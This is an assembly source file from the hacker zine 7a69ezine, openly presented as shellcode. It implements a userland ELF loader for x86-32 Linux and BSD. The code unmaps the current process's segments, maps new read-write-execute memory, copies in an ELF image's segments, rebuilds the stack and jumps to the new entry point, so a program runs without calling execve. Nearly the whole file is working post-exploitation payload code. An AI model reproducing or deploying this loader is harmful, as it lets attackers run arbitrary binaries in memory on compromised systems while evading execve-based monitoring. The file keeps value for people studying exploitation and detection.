/* 
 * can you imagine a execve without execve? can you imagine a shellcode that does that? :)
 *
 * (c) Pluf & Ripe / 7a69ezine.org
 */

#include <sys/syscall.h>


/*
        *****************************
        * ELF LOADER X86_32 (ELF32) *
        *****************************


	The ELF File Header 	

typedef struct
{
  unsigned char e_ident[EI_NIDENT];     Magic number and other info 
  Elf32_Half    e_type;                 Object file type 
  Elf32_Half    e_machine;              Architecture
  Elf32_Word    e_version;              Object file version 
  Elf32_Addr    e_entry;                Entry point virtual address 
  Elf32_Off     e_phoff;                Program header table file offset 
  Elf32_Off     e_shoff;                Section header table file offset 
  Elf32_Word    e_flags;                Processor-specific flags 
  Elf32_Half    e_ehsize;               ELF header size in bytes 
  Elf32_Half    e_phentsize;            Program header table entry size 
  Elf32_Half    e_phnum;                Program header table entry count 
  Elf32_Half    e_shentsize;            Section header table entry size 
  Elf32_Half    e_shnum;                Section header table entry count 
  Elf32_Half    e_shstrndx;             Section header string table index
} Elf32_Ehdr;

*/

//	ELF Header Offsets
#define EHDR_IDENT			0
#define EHDR_TYPE			16
#define EHDR_MACHINE			18
#define EHDR_VERSION			20
#define EHDR_ENTRY			24
#define EHDR_PHOFF			28
#define EHDR_SHOFF			32
#define EHDR_FLAGS			36
#define EHDR_EHSIZE			40
#define EHDR_PHENTSIZE			42
#define EHDR_PHNUM			44
#define EHDR_SHENTSIZE			46
#define EHDR_SHNUM			48
#define EHDR_SHSTRNDX			50

/*	Program Segment Header

typedef struct
{
  Elf32_Word    p_type;                 Segment type 
  Elf32_Off     p_offset;               Segment file offset 
  Elf32_Addr    p_vaddr;                Segment virtual address 
  Elf32_Addr    p_paddr;                Segment physical address 
  Elf32_Word    p_filesz;               Segment size in file 
  Elf32_Word    p_memsz;                Segment size in memory
  Elf32_Word    p_flags;                Segment flags 
  Elf32_Word    p_align;                Segment alignment 
} Elf32_Phdr;

*/

//	Program Header Offsets 
#define PHDR_TYPE			0
#define PHDR_OFFSET			4
#define PHDR_VADDR			8
#define PHDR_PADDR			12
#define PHDR_FILESZ			16
#define PHDR_MEMSZ			20
#define PHDR_FLAGS			24
#define PHDR_ALIGN			28

//	Program Header Type
#define PT_LOAD				1
#define PT_STACK			0x7a69

#define PHENTSIZE			32
#ifdef SYS_LINUX
#define MAPS				34	/* MAP_PRIVATE | MAP_ANONYMOUS */
#endif
#ifdef SYS_BSD
#define MAPS				4112	/* MAP_FIXED | MAP_ANON */	
#endif

#define PG_SIZE				0x1000

.global start_code
.global loader
loader:
	// The jumper saved the pointer to the memory area where
	// the OBJECT was placed. First of all we need get this pointer
	// in order to init the loading process. (ebp)
	popl	%ebp

	// Now, we get the pointer to the program header table. (ebx)
	movl	EHDR_PHOFF(%ebp),%edx		
	addl	%ebp,%edx			
	
	// Process each program header 
.loader_next_phdr:
	// Check program header type (eax): PT_LOAD or PT_STACK
	movl	(%edx),%eax
		
	cmpb  $0, EHDR_PHNUM(%ebp)
	je	.loader_phdr_stack
	decb	EHDR_PHNUM(%ebp)
	// If program header type is PT_LOAD, jump to .loader_phdr_load
	// and load the segment referenced by this header
	cmpl	$PT_LOAD,%eax
	je	.loader_phdr_load
	
	// If unknown type, jump to next header 
	addl	$PHENTSIZE,%edx
	jmp	.loader_next_phdr
	
	// Replace the old segment with the new one (PT_LOAD), it takes us four steps:
.loader_phdr_load:
	// First: setup new break pointer, init of heap
        movl	PHDR_VADDR(%edx),%esi
        addl	PHDR_MEMSZ(%edx),%esi
	addl	$PG_SIZE,%esi
	andl	$0xfffff000,%esi
        pushl	%esi
	pushl	$1
        movl	$SYS_break,%eax
	call	do_syscall
	addl	$8,%esp

	// Second: Unmap all the old space to ensure that the new segment
	// could be mapped without problems
	movl    PHDR_VADDR(%edx),%edi
	movl	PHDR_MEMSZ(%edx),%esi
	subl	$PG_SIZE,%esi
	movl	$0,%ecx
.loader_unmap_page:
	pushl	$PG_SIZE
	movl	%edi,%ebx
	andl	$0xfffff000,%ebx
	addl	%ecx,%ebx
	pushl	%ebx
	pushl	$2
	movl	$SYS_munmap,%eax
	call	do_syscall
	addl	$12,%esp
	addl	$PG_SIZE,%ecx
	cmpl	%ecx,%esi
	jge	.loader_unmap_page

	// Three: Map all the space needed by the new segment
	pushl	$0
	pushl	$0
	pushl	$-1
	pushl	$MAPS
	pushl 	$7
	movl	PHDR_MEMSZ(%edx),%esi
	pushl	%esi
	movl	%edi,%esi
	andl	$0xffff000,%esi
	pushl	%esi
	pushl	$6
	movl	$SYS_mmap,%eax
	call	do_syscall
	addl	$32,%esp

	// Four: Finally, copy segment from ELF File to its destination area
	movl	PHDR_FILESZ(%edx),%ecx
	movl	PHDR_OFFSET(%edx),%esi
	addl	%ebp,%esi
	repz	movsb

	// At this point, a segment has been loaded correctly, 
	// so we can process next header
	addl	$PHENTSIZE,%edx
	jmp	.loader_next_phdr

	// Load the new stack context (PT_STACK)
.loader_phdr_stack:
	movl	EHDR_SHOFF(%ebp),%esi //just the new location of the whole stack (EHDR *)
	addl	%ebp,%esi
	movl	EHDR_FLAGS(%ebp),%edi 
	movl	EHDR_VERSION(%ebp),%ecx
	repz	movsb

	// Finaly we jump to the entry point
.loader_entry_point:
	movl	EHDR_FLAGS(%ebp),%esp
	movl	EHDR_ENTRY(%ebp),%eax
	xorl	%ebx,%ebx
	xorl	%ecx,%ecx
	xorl	%edx,%edx
	xorl	%esi,%esi
	xorl	%edi,%edi
	jmp	*%eax

do_syscall:
#ifdef SYS_LINUX
	pusha
	movl	36(%esp),%ebp
	cmpl	$6,%ebp
	jge	.do_syscall_special
	movl	40(%esp),%ebx
	movl	44(%esp),%ecx
	movl	48(%esp),%edx
	movl	52(%esp),%esi
	movl	56(%esp),%edi
	jmp	.do_syscall_now
.do_syscall_special:
	movl	%esp,%ebx
	addl	$40,%ebx
.do_syscall_now:
	int	$0x80
	movl	%eax,28(%esp)
	popa
	ret
#endif
#ifdef SYS_BSD
	pusha
	addl	$40,%esp
	pushl	%eax
	int	$0x80
	subl	$36,%esp
	popa
	ret	
#endif
	
.global loader_end 
loader_end:
